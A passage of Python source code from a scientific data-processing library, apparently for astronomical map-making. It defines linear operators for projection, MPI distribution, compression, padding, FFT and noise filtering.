inplace, cachein, cacheout).ravel()\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Rounding(AcquisitionModel, Square):\n \"\"\"Rounding operator.\n \n The rounding method may be one of the following:\n - rtz : round towards zero (truncation)\n - rti : round towards infinity\n - rtmi : round towards minus infinity (floor)\n - rtpi : round towards positive infinity (ceil)\n - rhtz : round half towards zero\n - rhti : round half towards infinity (numpy's round, fortran's nint)\n - rhtmi : round half towards minus infinity\n - rhtpi : round half towards positive infinity\n - rhs : round half stochastically\n \"\"\"\n\n def __init__(self, method='rhti', **keywords):\n AcquisitionModel.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n method = method.lower()\n table = {'rtz' : tmf.round_rtz,\n 'rti' : tmf.round_rti,\n 'rtmi' : tmf.round_rtmi,\n 'rtpi' : tmf.round_rtpi,\n 'rhtz' : tmf.round_rhtz,\n 'rhti' : tmf.round_rhti,\n 'rhtmi' : tmf.round_rhtmi,\n 'rhtpi' : tmf.round_rhtpi,\n 'rhs' : tmf.round_rhs}\n if method not in table:\n raise ValueError('The rounding method must be one of the following'\\\n ': ' + ','.join(\"'\" + k + \"'\" for k in table.keys()) + '.')\n self.round = table[method]\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n self.round(output.T)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DiscreteDifference(AcquisitionModelLinear, Square):\n \"\"\"\n Discrete difference operator.\n\n Calculate the nth order discrete difference along given axis.\n \"\"\"\n\n def __init__(self, axis=0, n=1, comm=None, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n self.n = n\n self.axis = axis\n self.comm = comm or var.comm_map\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for i in range(self.n):\n diff(output, self.axis, comm=self.comm)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for i in range(self.n):\n diffT(output, self.axis, comm=self.comm)\n return output \n\n\n#-------------------------------------------------------------------------------\n\n\nclass DdTdd(Symmetric):\n \"\"\"Calculate operator dX.T dX along a given axis.\"\"\"\n\n def __init__(self, axis=0, scalar=1., description=None, comm=None,\n **keywords):\n if description is None and scalar != 1.:\n description = str(scalar) + ' DdTdd'\n Symmetric.__init__(self, **keywords)\n self.axis = axis\n self.scalar = scalar\n self.comm = comm or var.comm_map\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n diffTdiff(output, self.axis, self.scalar, comm=self.comm)\n return output\n\n \n#-------------------------------------------------------------------------------\n\n\nclass Projection(AcquisitionModelLinear):\n \"\"\"\n This class handles operations by the pointing matrix\n\n The input observation has the following required attributes/methods:\n - nfinesamples\n - nsamples\n - ndetectors\n - get_pointing_matrix()\n - unit\n The instance has the following specific attributes:\n - header: the FITS header of the map\n - pmatrix: transparent view of the pointing matrix\n - _pmatrix: opaque representation of the pointing matrix\n - npixels_per_sample: maximum number of sky map pixels that can be\n intercepted by a detector\n \"\"\"\n\n def __init__(self, observation, method=None, header=None, resolution=None,\n npixels_per_sample=0, oversampling=True, comm_map=None,\n packed=False, description=None):\n\n self.comm_map = comm_map or var.comm_map\n self.comm_tod = observation.comm_tod\n\n self.method, pmatrix, self.header, self.ndetectors, nsamples, \\\n self.npixels_per_sample, (unitout, unitin), (duout, duin) = \\\n observation.get_pointing_matrix(header,\n resolution,\n npixels_per_sample,\n method=method,\n oversampling=oversampling)\n\n self.nsamples_tot = int(np.sum(nsamples))\n self._pmatrix = pmatrix\n if self.npixels_per_sample == 0:\n pmatrix = np.empty(0, dtype=np.int64)\n self.pmatrix = pmatrix.view([('weight', 'f4'), ('pixel', 'i4')]) \\\n .view(np.recarray)\n self.pmatrix.shape = (self.ndetectors, np.sum(nsamples),\n self.npixels_per_sample)\n\n shapein = tuple([self.header['NAXIS'+str(i+1)] for i in \\\n range(self.header['NAXIS'])])[::-1]\n mask = Map.empty(shapein, dtype=np.bool8, header=self.header)\n tmf.pointing_matrix_mask(self._pmatrix, mask.view(np.int8).T, \n self.npixels_per_sample, self.nsamples_tot, self.ndetectors)\n\n ismapdistributed = self.comm_map.Get_size() > 1\n istoddistributed = self.comm_tod.Get_size() > 1\n self.ispacked = packed or ismapdistributed\n if self.ispacked:\n tmf.pointing_matrix_pack(self._pmatrix, mask.view(np.int8).T,\n self.npixels_per_sample, self.nsamples_tot, self.ndetectors)\n shapein = (int(np.sum(~mask)))\n\n attrin = {'header' : self.header}\n if duin is not None:\n attrin['derived_units'] = duin\n attrout = {}\n if duout is not None:\n attrout['derived_units'] = duout\n shapeout = combine_sliced_shape(self.ndetectors, nsamples)\n AcquisitionModelLinear.__init__(self,\n cache=True,\n description=description,\n attrin=attrin,\n attrout=attrout,\n shapein=shapein,\n shapeout=shapeout,\n typein=Map,\n typeout=Tod,\n unitin=unitin,\n unitout=unitout)\n self.mask = mask\n if not self.ispacked and not istoddistributed:\n return\n\n if self.ispacked:\n if ismapdistributed:\n self *= DistributionLocal(self.mask)\n else:\n self *= Packing(self.mask)\n elif istoddistributed:\n self *= DistributionGlobal(self.shapein, share=True,\n comm=self.comm_tod)\n s = self.blocks[0]\n self.header = s.header\n self.mask = s.mask\n self.method = s.method\n self.ndetectors = s.ndetectors\n self.npixels_per_sample = s.npixels_per_sample\n self.nsamples_tot = s.nsamples_tot\n self.pmatrix = s.pmatrix\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.pointing_matrix_direct(self._pmatrix, input.T, output.T,\n self.npixels_per_sample)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.pointing_matrix_transpose(self._pmatrix, input.T, output.T, \n self.npixels_per_sample)\n return output\n\n def get_ptp(self):\n npixels = np.product(self.shapein)\n return tmf.pointing_matrix_ptp(self._pmatrix, self.npixels_per_sample,\n self.nsamples_tot, self.ndetectors, npixels).T\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DistributionGlobal(AcquisitionModelLinear):\n \"\"\"\n Distribute a global map to different MPI processes.\n By default, they are locally distributed, in the sense that an MPI process\n will only handle a subset of the global map.\n \"\"\"\n\n def __init__(self, shape, share=False, comm=None, **keywords):\n\n if comm is None:\n comm = var.comm_map\n self.comm = comm\n\n # if share is true, the maps are not distributed\n if share:\n def direct(input, inplace, cachein, cacheout):\n return self.validate_input_inplace(input, inplace)\n def transpose(input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n if self.comm.Get_size() > 1:\n self.comm.Allreduce(MPI.IN_PLACE, [output, MPI.DOUBLE],\n op=MPI.SUM)\n return output\n AcquisitionModelLinear.__init__(self, shapein=shape, typein=Map,\n direct=direct, transpose=transpose,\n cache=False, **keywords)\n return\n\n shapeout = split_shape(shape, comm)\n self.counts = []\n self.offsets = [0]\n for rank in range(comm.Get_size()):\n s = split_work(shape[0], rank=rank, comm=comm)\n n = (s.stop - s.start) * np.product(shape[1:])\n self.counts.append(n)\n self.offsets.append(self.offsets[-1] + n)\n self.offsets.pop()\n attrin = { 'comm':MPI.COMM_SELF, 'shape_global':shape }\n attrout = { 'comm':self.comm, 'shape_global':shape }\n AcquisitionModelLinear.__init__(self, cache=True, shapein=shape,\n shapeout=shapeout, attrin=attrin, attrout=attrout, typein=Map,\n **keywords)\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n s = split_work(self.shapein[0], comm=self.comm)\n n = s.stop - s.start\n output[0:n] = input[s.start:s.stop]\n output[n:] = 0\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n s = split_work(self.shapein[0], comm=self.comm)\n n = s.stop - s.start\n self.comm.Allgatherv([input[0:n], MPI.DOUBLE], [output, (self.counts,\n self.offsets), MPI.DOUBLE])\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DistributionLocal(AcquisitionModelLinear):\n \"\"\"\n Scatter a distributed map to different MPI processes under the control of a\n local non-distributed mask.\n \"\"\"\n\n def __init__(self, mask, operator=MPI.SUM, comm=None, **keywords):\n if comm is None:\n comm = var.comm_map\n shapeout = (int(np.sum(~mask)),)\n shapein = split_shape(mask.shape, comm)\n attrin = { 'comm':comm, 'shape_global':mask.shape }\n attrout = { 'comm':MPI.COMM_SELF, 'shape_global':shapeout}\n AcquisitionModelLinear.__init__(self, cache=True, typein=Map,\n shapein=shapein, shapeout=shapeout, attrin=attrin, **keywords)\n self.comm = comm\n self.mask = mask\n self.operator = operator\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n status = tmf.mpi_allscatterlocal(input.T, self.mask.view(np.int8).T,\n output.T, self.comm.py2f())\n if status == 0: return output\n if status < 0:\n raise RuntimeError('Incompatible sizes.')\n raise MPI.Exception(status)\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n status = tmf.mpi_allreducelocal(input.T, self.mask.view(np.int8).T,\n output.T, self.operator.py2f(), self.comm.py2f())\n if status == 0: return output\n if status < 0:\n raise RuntimeError('Incompatible mask.')\n raise MPI.Exception(status)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Compression(AcquisitionModelLinear):\n \"\"\"\n Abstract class for compressing the input signal.\n \"\"\"\n\n def __init__(self, compression_factor, shapein=None, **keywords):\n if _my_isscalar(compression_factor):\n compression_factor = (compression_factor,)\n self.factor = np.array(compression_factor, int)\n\n if np.all(self.factor == 1):\n def direct(input, inplace, cachein, cacheout):\n return self.validate_input_inplace(input, inplace)\n transpose = direct\n cache = False\n else:\n direct = None\n transpose = None\n cache = True\n shapeout = self.validate_shapein(shapein)\n AcquisitionModelLinear.__init__(self,\n direct=direct,\n transpose=transpose,\n cache=cache,\n shapein=shapein,\n shapeout=shapeout,\n typein=Tod,\n **keywords)\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return None\n if np.any(np.array(shapein[-1]) % self.factor != 0):\n raise ValidationError('The input timeline size ('+str(shapein[-1])+\\\n ') is not an integer times the compression factor (' + \\\n str(self.factor)+').')\n return combine_sliced_shape(shapein[0:-1],\n np.array(shapein[-1]) / self.factor)\n\n def validate_shapeout(self, shapeout):\n if shapeout is None:\n return None\n if self.shapeout is not None and flatten_sliced_shape(shapeout) == \\\n flatten_sliced_shape(self.shapeout):\n return self.shapein\n return combine_sliced_shape(shapeout[0:-1],\n np.array(shapeout[-1]) * self.factor)\n\n def __str__(self):\n return super(Compression, self).__str__()+' (x'+str(self.factor)+')'\n \n\n#-------------------------------------------------------------------------------\n\n\nclass CompressionAverage(Compression):\n \"\"\"\n Compress the input signal by averaging blocks of specified size.\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.compression_average_direct(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.compression_average_transpose(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DownSampling(Compression):\n \"\"\"\n Downsample the input signal by picking up one sample out of a number\n specified by the compression factor\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.downsampling_direct(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.downsampling_transpose(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Identity(Symmetric):\n \"\"\"\n Identity class.\n \"\"\"\n\n def __init__(self, **keywords):\n Symmetric.__init__(self, **keywords)\n\n def direct(self, input, inplace, cachein, cacheout):\n return self.validate_input_inplace(input, inplace)\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Scalar(Diagonal):\n \"\"\"\n Class for scalar multiplication\n \"\"\"\n\n def __init__(self, value, **keywords):\n if not np.iscomplex(value):\n value = np.real(value)\n Diagonal.__init__(self, value, **keywords)\n \n def __str__(self):\n return super(self.__class__, self).__str__()+' (' + \\\n str(self.data) + ')'\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Masking(Symmetric):\n \"\"\"\n Mask operator.\n\n Sets to zero values whose mask is True (non-null). The input of a Masking\n instance can be of rank greater than the speficied mask, in which case the\n latter is broadcast along the fast dimensions.\n \"\"\"\n\n def __init__(self, mask, **keywords):\n Symmetric.__init__(self, dtype=var.FLOAT_DTYPE, **keywords)\n if mask is None:\n print('Warning: input mask is None.')\n mask = False\n mask = np.array(mask, order='c', dtype=np.bool8)\n self.isscalar = mask.ndim == 0\n self.mask = np.array(mask, ndmin=1, copy=False)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n status = tmf.masking(output.T, self.mask.view(np.int8).T)\n if status != 0: raise RuntimeError()\n return output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return self.shapein\n if self.isscalar:\n return shapein\n if flatten_sliced_shape(shapein[0:self.mask.ndim]) != self.mask.shape:\n raise ValueError('The input has shape ' + str(shapein) + ' incomp' \\\n 'atible with that of the mask ' + str(self.mask.shape) + '.')\n return shapein\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Unpacking(AcquisitionModelLinear):\n \"\"\"\n Convert 1d map into an nd array, under the control of a mask.\n The elements for which the mask is True are equal to the field argument.\n \"\"\"\n\n def __init__(self, mask, field=0., **keywords):\n mask = np.array(mask, np.bool8)\n AcquisitionModelLinear.__init__(self,\n cache=True,\n shapein=np.sum(mask == 0),\n shapeout=mask.shape,\n **keywords)\n self.mask = mask\n self.field = field\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.unpack_direct(input.T, self.mask.view(np.int8).T, output.T,\n self.field)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.unpack_transpose(input.T, self.mask.view(np.int8).T, output.T)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Packing(AcquisitionModelLinear):\n \"\"\"\n Convert an nd array in a 1d map, under the control of a mask.\n The elements for which the mask is True are equal to the field argument.\n \"\"\"\n\n def __init__(self, mask, field=0., **keywords):\n mask = np.array(mask, np.bool8)\n AcquisitionModelLinear.__init__(self,\n cache=True,\n shapein=mask.shape,\n shapeout=np.sum(mask == 0),\n **keywords)\n self.mask = mask\n self.field = field\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.unpack_transpose(input.T, self.mask.view(np.int8).T, output.T)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.unpack_direct(input.T, self.mask.view(np.int8).T, output.T,\n self.field)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Reshaping(AcquisitionModelLinear):\n \"\"\"\n Reshape arrays\n \"\"\"\n\n def __init__(self, shapein, shapeout, **keywords):\n if shapein is None or shapeout is None:\n raise ValueError('The shapes are not defined.')\n if np.product(flatten_sliced_shape(shapein)) != \\\n np.product(flatten_sliced_shape(shapeout)):\n raise ValueError('The number of elements of the input and output o'\\\n 'f the Reshaping operator are incompatible.')\n AcquisitionModelLinear.__init__(self, shapein=shapein,\n shapeout=shapeout, **keywords)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_direct(input, inplace)\n output = _smart_reshape(output, self.shapeout)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_transpose(input, inplace)\n output = _smart_reshape(output, self.shapein)\n return output\n\n def validate_input_direct(self, input, inplace):\n input = np.array(input, ndmin=1, copy=not inplace, subok=True)\n shapeout = self.validate_shapein(input.shape)\n return input\n\n def validate_input_transpose(self, input, inplace):\n input = np.array(input, ndmin=1, copy=not inplace, subok=True)\n shapeout = self.validate_shapeout(input.shape)\n return input\n\n\n#-------------------------------------------------------------------------------\n\n\nclass ResponseTruncatedExponential(AcquisitionModelLinear, Square):\n \"\"\"\n ResponseTruncatedExponential(tau)\n\n Apply a truncated exponential response to the signal\n\n Parameters\n ==========\n \n tau: number\n Time constant divided by the signal sampling period\n \"\"\"\n \n def __init__(self, tau, **keywords):\n \"\"\"\n \"\"\"\n AcquisitionModelLinear.__init__(self, typein=Tod, **keywords)\n Square.__init__(self, **keywords)\n if hasattr(tau, 'SI'):\n tau = tau.SI\n if tau.unit != '':\n raise ValueError('The time constant must be dimensionless.')\n self.tau = np.array(tau, dtype=var.FLOAT_DTYPE, ndmin=1)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n tmf.convolution_trexp_direct(output.T, np.array(output.nsamples),\n self.tau)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n tmf.convolution_trexp_transpose(output.T, np.array(output.nsamples),\n self.tau)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Padding(AcquisitionModelLinear):\n \"Pads before and after a Tod.\"\n\n def __init__(self, left=0, right=0, value=0., shapein=None, **keywords):\n if shapein is not None:\n shapeout = self.validate_shapein(shapein)\n else:\n shapeout = None\n AcquisitionModelLinear.__init__(self,\n cache=True,\n shapein=shapein,\n shapeout=shapeout,\n typein=Tod,\n **keywords)\n left = np.array(left, ndmin=1, dtype=int)\n right = np.array(right, ndmin=1, dtype=int)\n if np.any(left < 0):\n raise ValueError('Left padding is not positive.')\n if np.any(right < 0):\n raise ValueError('Right padding is not positive.')\n if np.rank(left) != 1 or np.rank(right) != 1:\n raise ValueError('Padding must be scalar or a vector.')\n self.left = tuple(left)\n self.right = tuple(right)\n self.value = value\n \n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n dest = 0\n dest_padded = 0\n for islice in range(len(input.nsamples)):\n nsamples = input.nsamples[islice]\n left = self.left[islice if len(self.left) > 1 else 0]\n output[...,dest_padded:dest_padded+left] = self.value\n output[...,dest_padded+left:dest_padded+left+nsamples] = \\\n input[...,dest:dest+nsamples]\n output[...,dest_padded+left+nsamples:dest_padded+ \\\n output.nsamples[islice]] = self.value\n dest += nsamples\n dest_padded += output.nsamples[islice]\n return output\n \n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n dest = 0\n dest_padded = 0\n for islice in range(len(input.nsamples)):\n nsamples = output.nsamples[islice]\n left = self.left [islice if len(self.left) > 1 else 0]\n output[...,dest:dest+nsamples] = \\\n input[...,dest_padded+left:dest_padded+left+nsamples]\n dest += nsamples\n dest_padded += input.nsamples[islice]\n return output\n\n def validate_input_direct(self, input, cachein, cacheout):\n input, output = super(Padding, self).validate_input_direct(input,\n cachein, cacheout)\n if len(self.left) != 1 and len(self.left) != len(input.nsamples):\n raise ValueError(\"The input Tod has a number of slices '\" + \\\n str(len(input.nsamples)) + \\\n \"' incompatible with the specified padding.\")\n return input, output\n \n def validate_input_transpose(self, input, cachein, cacheout):\n input, output = super(Padding, self).validate_input_transpose(input,\n cachein, cacheout)\n if len(self.left) != 1 and len(self.left) != len(input.nsamples):\n raise ValueError(\"The input Tod has a number of slices '\" + \\\n str(len(input.nsamples)) +\n \"' incompatible with the specified padding.\")\n return input, output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return None\n return combine_sliced_shape(shapein[0:-1], np.array(shapein[-1]) + \\\n self.left + self.right)\n \n def validate_shapeout(self, shapeout):\n if shapeout is None:\n return None\n return combine_sliced_shape(shapeout[0:-1], np.array(shapeout[-1]) -\\\n self.left - self.right)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Shift(AcquisitionModelLinear, Square):\n\n def __init__(self, n, axis=None, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n if axis is None:\n if not isinstance(n, (list, tuple, np.ndarray)):\n n = (n,)\n axis = tuple(np.arange(-len(n), 0))\n elif not isinstance(axis, (list, tuple, np.ndarray)):\n n = (n,)\n axis = (axis,)\n elif not isinstance(n, (list, tuple, np.ndarray)) or \\\n len(n) != len(axis):\n n = len(axis) * (n,)\n self.n = [np.array(v, dtype=int) for v in n]\n self.axis = [int(v) for v in axis]\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for n, axis in zip(self.n, self.axis):\n shift(output, n, axis)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for n, axis in zip(self.n, self.axis):\n shift(output, -n, axis)\n return output \n\n\n#-------------------------------------------------------------------------------\n\n\nclass CircularShift(AcquisitionModelLinear, Square):\n \n def __init__(self, n, axis=None, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n if _my_isscalar(n):\n n = (n,)\n if axis is None:\n axis = tuple(np.arange(-len(n), 0))\n elif _my_isscalar(axis):\n axis = (axis,)\n self.n = tuple(map(int, n))\n self.axis = tuple(map(int, axis))\n\n def direct(self, input, inplace, cachein, cacheout):\n for axis, n in zip(self.axis, self.n):\n input = np.roll(input, -n, axis=axis)\n return input\n\n def transpose(self, input, inplace, cachein, cacheout):\n for axis, n in zip(self.axis, self.n):\n input = np.roll(input, n, axis=axis)\n return input\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Fft(AcquisitionModelLinear, Square):\n \"\"\"\n Performs complex fft\n \"\"\"\n\n def __init__(self, shape, flags=['estimate'], **keywords):\n AcquisitionModelLinear.__init__(self, shapein=shape,\n dtype=var.COMPLEX_DTYPE, **keywords)\n Square.__init__(self, **keywords)\n if fftw3.planning.lib_threads is None:\n nthreads = 1\n else:\n nthreads = tmf.info_nthreads()\n self.n = np.product(shape)\n self._in = np.zeros(shape, dtype=var.COMPLEX_DTYPE)\n self._out = np.zeros(shape, dtype=var.COMPLEX_DTYPE)\n self.forward_plan = fftw3.Plan(self._in, self._out, direction='forward',\n flags=flags, nthreads=nthreads)\n self.backward_plan= fftw3.Plan(self._in, self._out,direction='backward',\n flags=flags, nthreads=nthreads)\n\n def direct(self, input, inplace, cachein, cacheout):\n self._in[:] = input\n fftw3.execute(self.forward_plan)\n return Map(self._out)\n\n def transpose(self, input, inplace, cachein, cacheout):\n self._in[:] = input\n fftw3.execute(self.backward_plan)\n return Map(self._out / self.n, copy=False)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass FftHalfComplex(AcquisitionModelLinear, Square):\n \"\"\"\n Performs real-to-half-complex fft\n \"\"\"\n\n def __init__(self, nsamples, **keywords):\n AcquisitionModelLinear.__init__(self, typein=Tod, **keywords)\n Square.__init__(self, **keywords)\n self.nsamples = tuple(np.array(nsamples, ndmin=1, dtype=int))\n self.forward_plan = np.empty(len(self.nsamples), dtype=int)\n self.backward_plan = np.empty(len(self.nsamples), dtype=int)\n for i, n in enumerate(self.nsamples):\n tarray = np.empty(n, dtype=var.FLOAT_DTYPE)\n farray = np.empty(n, dtype=var.FLOAT_DTYPE)\n self.forward_plan[i] = \\\n fftw3.Plan(tarray, farray, direction='forward',\n flags=['measure'], realtypes=['halfcomplex r2c'],\n nthreads=1)._get_parameter()\n self.backward_plan[i] = \\\n fftw3.Plan(farray, tarray, direction='backward',\n flags=['measure'], realtypes=['halfcomplex c2r'],\n nthreads=1)._get_parameter()\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n output_ = _smart_reshape(output, (np.product(input.shape[:-1]),\n input.shape[-1]))\n tmf.fft_plan(output_.T, np.array(self.nsamples), self.forward_plan)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n output_ = _smart_reshape(output, (np.product(input.shape[:-1]), \n input.shape[-1]))\n tmf.fft_plan(output_.T, np.array(self.nsamples), self.backward_plan)\n dest = 0\n for n in self.nsamples:\n output_[:,dest:dest+n] /= n\n dest += n\n return output\n\n def validate_shapein(self, shape):\n if shape is None:\n return None\n nsamples = shape[-1]\n if nsamples != self.nsamples and nsamples != sum(self.nsamples):\n raise ValidationError(\"Invalid FFT size '\" + str(nsamples) + \\\n \"' instead of '\"+str(self.nsamples)+\"'.\")\n return combine_sliced_shape(shape[0:-1], self.nsamples)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Convolution(Symmetric):\n\n def __init__(self, kernel, **keywords):\n Symmetric.__init__(self, **keywords)\n self.kernel = np.asanyarray(kernel)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n output[:] = scipy.signal.fftconvolve(input, self.kernel, mode='same')\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass InvNtt(AcquisitionModelLinear):\n\n def __init__(self, obs, filename=None, **keywords):\n nsamples = obs.get_nsamples()\n length = np.asarray(2**np.ceil(np.log2(np.array(nsamples) + 200)), int)\n invntt = self._get_diagonal(length, obs.get_filter_uncorrelated(\n filename=filename, **keywords))\n fft = FftHalfComplex(length)\n padding = Padding(left=invntt.ncorrelations, right=length - nsamples - \\\n invntt.ncorrelations)\n _tocompositemodel(self, Composition,\n [ padding.T, fft.T, invntt, fft, padding ])\n\n def _get_diagonal(self, nsamples, filter, **keywords):\n nsamples = np.asarray(nsamples)\n ndetectors = filter.shape[-2]\n ncorrelations = filter.shape[-1] - 1\n nslices = nsamples.size\n if np.rank(filter) == 2:\n filter = np.resize(filter,(nslices, ndetectors, ncorrelations+1))\n tod_filter, status = \\\n tmf.fft_filter_uncorrelated(filter.T, np.asarray(nsamples, \n dtype=np.int32), np.sum(nsamples))\n if status != 0: raise RuntimeError()\n d = Diagonal(tod_filter.T, shapein=tod_filter.T.shape, **keywords)\n d = np.maximum(d, 0)\n d.data /= var.comm_tod.allreduce(np.max(d.data), op=MPI.MAX)\n d.ncorrelations = ncorrelations\n return d\n\n\n#-------------------------------------------------------------------------------\n\n\nclass SqrtInvNtt(InvNtt):\n def __init__(self, *args, **kw):\n invntt = InvNtt(*args, **kw)\n _tocompositemodel(self, Composition, invntt.blocks)\n data = self.blocks[2].data\n data[:] = np.sqrt(data)\n #np.sqrt(data, out=data) does not work with numpy 1.5\n\n\n#-------------------------------------------------------------------------------\n\n\nclass InterpolationLinear(AcquisitionModelLinear, Square):\n\n def __init__(self, mask, **keywords):\n AcquisitionModelLinear.__init__(self, attrin={'mask':mask}, **keywords)\n Square.__init__(self, **keywords)\n self.mask = mask\n\n def direct(self, input, inplace, cachein, cacheout):\n return interpolate_linear(output)\n\n def transpose(self, input, inplace, cachein, cacheout):\n raise NotImplementedError()\n\n\n#-------------------------------------------------------------------------------\n\n\ndef acquisitionmodel_factory(direct, transpose=None, description=None, **keywords):\n \"\"\"Creates an AcquisitionModel from a function\"\"\"\n description = description or direct.__name__\n if description == '':\n description = ''\n\n if transpose is None:\n a = AcquisitionModel(description=description, **keywords)\n else:\n a = AcquisitionModelLinear(description=description, **keywords)\n\n def d(input, inplace, cachein, cacheout):\n output = a.validate_input_inplace(input, inplace)\n return direct(output)\n a.direct = d\n if transpose is None:\n return a\n\n def t(input, inplace, cachein, cacheout):\n output = a.validate_input_inplace(input, inplace)\n return transpose(output)\n a.transpose = t\n return a\n\ndef Clip(vmin, vmax, description=None, **keywords):\n description = description or 'Clip'\n return acquisitionmodel_factory(lambda x: np.clip(x, vmin, vmax, out=x),\n description=description, **keywords)\n\ndef Maximum(value, description=None, **keywords):\n description = description or 'Maximum'\n return acquisitionmodel_factory(lambda x: np.maximum(x, value, x),\n description=description, **keywords)\n\ndef Minimum(value, description=None, **keywords):\n description = description or 'Minimum'\n return acquisitionmodel_factory(lambda x: np.minimum(x, value, x),\n description=description, **keywords)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef asacquisitionmodel(operator, shapein=None, shapeout=None, description=None):\n if isinstance(operator, AcquisitionModel):\n if shapein and operator.shapein and shapein != operator.shapein:\n raise ValueError('The input shapein ' + str(shapein) + ' is incom' \\\n 'patible with that of the input ' + str(operator.shapein) + '.')\n if shapeout and operator.shapeout and shapeout != operator.shapeout:\n raise ValueError('The input shapeout ' + str(shapeout) + ' is inco'\\\n 'mpatible with that of the input ' + str(operator.shapeout) + \\\n '.')\n if shapein and not operator.shapein or \\\n shapeout and not operator.shapeout:\n operator = copy.copy(operator)\n operator.shapein = shapein\n operator.shapeout = shapeout\n return operator\n if _my_isscalar(operator):\n return Scalar(operator)\n if isinstance(operator, LinearOperator):\n direct = lambda input, inplace, cachein, cacheout: \\\n operator.matvec(input)\n transpose = lambda input, inplace, cachein, cacheout: \\\n operator.rmatvec(input)\n model = AcquisitionModelLinear(direct=direct,\n transpose=transpose,\n shapein=shapein or operator.shape[1],\n shapeout=shapeout or operator.shape[0],\n dtype=operator.dtype,\n description=description)\n return model\n return asacquisitionmodel(scipy.sparse.linalg.aslinearoperator(operator),\n description=description)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _tocompositemodel(model, cls, models):\n if model.__class__ == cls:\n return model\n model.__class__ = cls\n model.__init__(models)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _get_dtype(type1, type2):\n t1 = type1.type()\n t2 = type2.type()\n t = t1 * t2\n return t.dtype\n\n\n#-------------------------------------------------------------------------------\n\n\ndef 